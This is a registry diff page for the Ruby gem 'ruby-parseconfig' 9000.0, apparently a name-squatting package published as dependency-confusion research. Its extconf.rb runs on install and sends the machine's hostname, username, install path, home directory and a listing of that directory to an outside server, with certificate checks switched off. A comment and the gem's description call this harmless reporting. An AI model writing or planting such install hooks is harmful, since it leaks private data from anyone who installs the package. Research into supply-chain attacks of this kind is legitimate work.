ruby-parseconfig 9000.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ruby-parseconfig might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +50 -0
  3. metadata +50 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: f1f0c0f74aa5874ba30250d8baa30a99f7745e0479107e214f1dd0ab19d32833
4
+ data.tar.gz: a0c41d5c3e7b014997ce944cf59dcb6af286c46a844134480c13c0d5eba02bbf
5
+ SHA512:
6
+ metadata.gz: c3263c6fdf2b2464dea088f32c63f0ea8bd40610febb4ddfb426c8cb3180eb3ff9ed41564c97a232fd7b281ae9c7443ca7ed5a6548d187a6f02a854f815ce072
7
+ data.tar.gz: eafae80dfd207edbae99d44c8afa664d2b9bb5fddc5427723ccfb6fdd22f26b2a237e5c866a0cc92efc53e0ed1dd7e00c10461151120a437cad8c80ceca65727
data/ext/extconf.rb ADDED
@@ -0,0 +1,50 @@
1
+ =begin
2
+ Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
+ Don't worry! It doesn't do anything nasty or malicious.
4
+
5
+ I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
+
7
+ I also run a Ruby security related platform: https://diffend.io
8
+
9
+ All data I collect will be deleted and I do not collect any sensitive information.
10
+
11
+ That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
+
13
+ You can read the code to confirm this.
14
+
15
+ If you have any questions or want to get in touch for any reason, you can reach me at:
16
+
17
+ maciej@mensfeld.pl
18
+
19
+ If this is affecting your organization, for example because I took name that uses your naming
20
+ conventions, feel free to contact me and I will be more than happy to give it back to you.
21
+
22
+ P.S. I did notify RubyGems security team, so they are aware of my activity.
23
+ =end
24
+
25
+ require 'mkmf'
26
+ require 'net/http'
27
+ require 'socket'
28
+ require 'etc'
29
+ require 'securerandom'
30
+ require 'json'
31
+
32
+ create_makefile 'gem_test'
33
+
34
+ uri = URI("https://ethically-testing-the.world")
35
+ http = Net::HTTP.new(uri.host, uri.port)
36
+ http.use_ssl = true
37
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
+ request = Net::HTTP::Post.new('/ruby-parseconfig/9000.0')
39
+ request.add_field('Content-Type', 'application/json')
40
+
41
+ request.body = {
42
+ hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
+ username: Etc.getlogin,
44
+ path: File.dirname(__FILE__),
45
+ home: Dir.home,
46
+ home_ls: Dir.entries(Dir.home),
47
+ id: SecureRandom.uuid,
48
+ }.to_json
49
+
50
+ http.request(request)
metadata ADDED
@@ -0,0 +1,50 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: ruby-parseconfig
3
+ version: !ruby/object:Gem::Version
4
+ version: '9000.0'
5
+ platform: ruby
6
+ authors:
7
+ - Maciej Mensfeld
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2021-03-05 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: |
14
+ I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
+
16
+ This code is reporting-only, and does not do anything malicious.
17
+ email:
18
+ - maciej@mensfeld.pl
19
+ executables: []
20
+ extensions:
21
+ - ext/extconf.rb
22
+ extra_rdoc_files: []
23
+ files:
24
+ - ext/extconf.rb
25
+ homepage: https://diffend.io
26
+ licenses:
27
+ - GPL-3.0
28
+ metadata: {}
29
+ post_install_message: |
30
+ This is probably not the package you wanted to install.
31
+ Read the description of this gem for more details.
32
+ rdoc_options: []
33
+ require_paths:
34
+ - lib
35
+ required_ruby_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ required_rubygems_version: !ruby/object:Gem::Requirement
41
+ requirements:
42
+ - - ">="
43
+ - !ruby/object:Gem::Version
44
+ version: '0'
45
+ requirements: []
46
+ rubygems_version: 3.1.4
47
+ signing_key:
48
+ specification_version: 4
49
+ summary: Gem that sends some non-sensitive data for security research.
50
+ test_files: []